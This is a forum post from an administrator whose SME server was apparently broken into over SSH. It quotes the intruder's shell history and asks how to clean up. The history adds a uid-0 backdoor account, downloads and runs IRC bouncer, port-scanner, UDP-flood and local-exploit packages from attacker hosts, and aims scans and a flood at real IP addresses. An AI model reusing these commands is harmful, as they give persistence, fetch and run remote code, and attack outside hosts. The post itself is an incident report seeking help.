It looks like my server security was breached. I think due to a lazy password for an SSH login. But once in, I don't know how they managed to change the admin password, which was very secure. The root password was not changed. I'm curious as to what they were up to. Below is some of the command history.
$ /usr/sbin/useradd -u -0 -o -g -0 gepe
later, this appears
42 lynx
www.cservice.undernet.org/live 43 w
44 ps x
45 cd .gepe
46 mkdir .gepe
47 cd .gepe
48 wget bnc-irc.trei.ro/linux/psybnc.tar.gz
49 tar xzvf psybnc.tar.gz
50 cd psybnc
51 make
52 cd -
53 wget
http://whynot.saveitfree.com/linux.tgz 54 w
55 cd .gepe
56 ls
57 wget
http://iasi-hack.sufx.net/strobe.zip 58 tar xzvf strobe.zip
59 cd strobe
60 ./strobe 85.204.247.250
61 ./strobe 89.108.81.36
62 ./strobe 194.84.153.50
63 ./strobe 195.199.197.243
64 ./strobe 81.183.216.57
65 w
66 ps x
67 cd .gepe
68 ls
69 cd psybnc
70 ./psybnc
71 ls
72 make
73 cd -
74 wget
http://whynot.saveitfree.com/linux.tgz 75 tar xzvf linux.tgz
76 cd vlad/
77 ./bash
78 cd .gepe
79 cd strobe
80 ./strobe 217.10.221.145
81 w
82 ls
83 cd .gepe
84 ls
85 cd strobe
86 ./strobe 217.10.195.146
87 ./strobe 217.10.199.254
88 w
89 ls
90 cd .gepe
91 ls
92 wget
http://cutitas.uv.ro/udp.tgz 93 tar xzvf udp.tgz
94 perl udp.pl 80.17.241.75 0 0
95 cd .gepe
96 ls
97 cd eplo
98 cd exploituri/
99 ./p
100 ls
101 ./p
102 ./I
103 id
104 ls
105 cd -
106 ls
107 cd
108 ls
109 cd .gepe
110 uname -a
111 wget help-bnc.octopis.com/do.tgz
112 tar xzvf do.tgz
113 ls
114 ./do
Then I looked in the mail directory. There is no entry for "gepe", but the root entry looked like this:
-rw-rw---- 1 root root 0 Mar 22 02:19 gepe
I have now set my hardware firewall (Sonicwall) to not allow any inbound or outbound traffic from the server. I'd like to avoid having to reinstall if I can figure out how to undo/disable whatever they may have installed. Plus, I'll reset all the passwords to a higher lever and put very strict port rules on the firewall.
Any comments would be greatly appreciated. (The server is SME 6.01)
Thanks!